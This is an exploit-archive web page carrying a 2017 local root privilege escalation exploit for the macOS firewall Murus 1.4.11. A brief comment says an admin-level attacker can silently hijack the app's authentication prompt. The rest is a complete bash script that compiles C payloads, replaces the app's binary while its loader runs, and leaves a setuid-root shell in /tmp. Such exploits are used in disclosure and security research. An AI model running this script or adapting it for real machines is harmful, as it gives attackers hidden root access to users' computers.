Security home

 

Home / exploitsPDF  

Murus 1.4.11 Local Privilege Escalation

Posted on 07 December 2017

# I recently blogged about the prevalence of escalation hijack vulnerabilities amongst macOS applications. One example of this is the latest version of Murus # firewall. By design it requires the user to authenticate every time in order to obtain the access it needs to modify the firewall settings. # If a local attacker or malware is running as an admin user (ie has write access to /Applications/) they can subvert this process to silently obtain root access # without the user knowing. # https://m4.rkw.io/murus1.4.11.sh.txt # 9c332c07747e11c78c34f9dc8d30127250d95edd5e58a571ed1a005eafd32301 # ------------------------------------------------------------------------------- #!/bin/bash ################################################################## ###### Murus 1.4.11 local root privilege escalation exploit ###### ###### by m4rkw - https://m4.rkw.io/blog.html ###### ################################################################## echo "compiling payloads..." cat > /tmp/murus411_exp.c <<EOF #include <unistd.h> int main() { setuid(0); seteuid(0); execl("/bin/bash","bash","-c","rm -f /tmp/murus411_exp; /bin/bash",NULL); return 0; } EOF gcc -o /tmp/murus411_exp /tmp/murus411_exp.c if [ ! $? -eq 0 ] ; then rm -f /tmp/murus411_exp.c echo "failed to compile, dev tools may not be installed" exit 1 fi rm -f /tmp/murus411_exp.c cat > /tmp/murus411_exp2.c <<EOF #include <unistd.h> #include <stdlib.h> int main() { setuid(0); seteuid(0); system("chown root:wheel /tmp/murus411_exp"); system("chmod 4755 /tmp/murus411_exp"); system("mv /Applications/Murus.app/Contents/MacOS/Murus.orig /Applications/ Murus.app/Contents/MacOS/Murus"); execl("/Applications/Murus.app/Contents/MacOS/Murus","Murus",NULL); return 0; } EOF gcc -o /tmp/murus411_exp2 /tmp/murus411_exp2.c rm -f /tmp/murus411_exp2.c echo "waiting for loader..." while : do ps auxwww |grep '/Applications/Murus.app/Contents/MacOS/MurusLoader' |grep -v grep 1>/dev/null if [ $? -eq 0 ] ; then break fi done echo "planting payload..." mv /Applications/Murus.app/Contents/MacOS/Murus /Applications/Murus.app/ Contents/MacOS/Murus.orig mv /tmp/murus411_exp2 /Applications/Murus.app/Contents/MacOS/Murus echo "waiting for payload to trigger..." while : do r=`ls -la /tmp/murus411_exp |grep root` if [ "$r" != "" ] ; then break fi sleep 0.1 done echo "kapow" /tmp/murus411_exp

 

TOP

Malware :

Exploits :